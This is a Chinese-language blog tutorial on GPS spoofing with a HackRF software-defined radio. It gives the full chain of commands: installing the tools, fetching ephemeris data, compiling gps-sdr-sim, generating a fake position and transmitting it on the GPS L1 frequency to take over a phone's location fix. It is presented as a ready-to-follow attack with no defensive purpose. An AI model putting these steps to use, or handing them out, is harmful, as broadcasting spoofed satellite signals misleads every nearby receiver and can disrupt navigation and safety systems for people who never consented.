WiFi定位劫持·续篇——GPS劫持

Posted 2020-10-26

准备工作：

这里使用的设备是hackrf，所以需要在kali下安运行hackrf的驱动和环境。打开终端，在终端中输入以下命令：

sudo apt-get install hackrf libhackrf-dev libhackrf0

安装完毕之后，插上hackrf，运行以下命令，可查看hackrf的基本情况如下所示：

hackrf_info

接下来需要安装一些其他软件，在终端输入以下命令：

apt-get install gnuradio gnuradio-dev gr-osmosdr gr-osmosdr gqrx-sdr wireshark

安装成功后，就可以将hackrf的GPS外部时钟安装上，要正确安装安装的图片如下所示：

安装完毕之后，接上相应的天线，因为这里是发射GPS信号，所以需要将一根天线连接ANT端，一根连接OUT端，连接完毕之后如下所示：

在GPS定位中需要用到相应的导航电文，最新的导航电文可以到这个网址找到。

ftp://cddis.gsfc.nasa.gov/pub/gps/data/daily

注意，在这里我们需要的是最新的导航电文，如果不是最新的导航电文可能会导致实验失败。我们可以在这里点击最新的年份，这里选择2017年的导航电文如下所示：

点击2017年的导航电文后，拉到最底部找到brdc文件夹，出现如下界面，在其中找到最新的电文，下载下来。如下所示

然后将其中的导航电文解压出来如下所示：

接下来从git上面下载所需的软件gps-sdr-sim。在终端输入如下命令即可：

Git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim

在这里需要注意，使用gcc编译gps-sdr-sim时如果无效，请安装gcc这个软件。命令如下：

apt-get install gcc

成功后会在当前目录出现gps-sdr-sim的可执行文件。
然后随便挑选一个经纬度，这里选择的是经度为0，纬度为0。

在当前目录下，终端上执行如下命令：

./gps-sdr-sim -e brdc0820.17n -l 0,0,100 -b 8 -d 100

接下来就是让hackrf将这个文件中的内容发射出去，注意由于现在的手机基本上都采用GPS定位，基站网格定位，和Wifi定位3种方式合一，所以这里需要使手机处于飞行模式才可以。在终端输入如下命令：

hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 -R

可以发现，在欺骗成功后，连接的卫星数量会有明显的上升。这是因为我们假冒了其中很多的卫星。截图如下：
GPS劫持前：

GPS劫持后：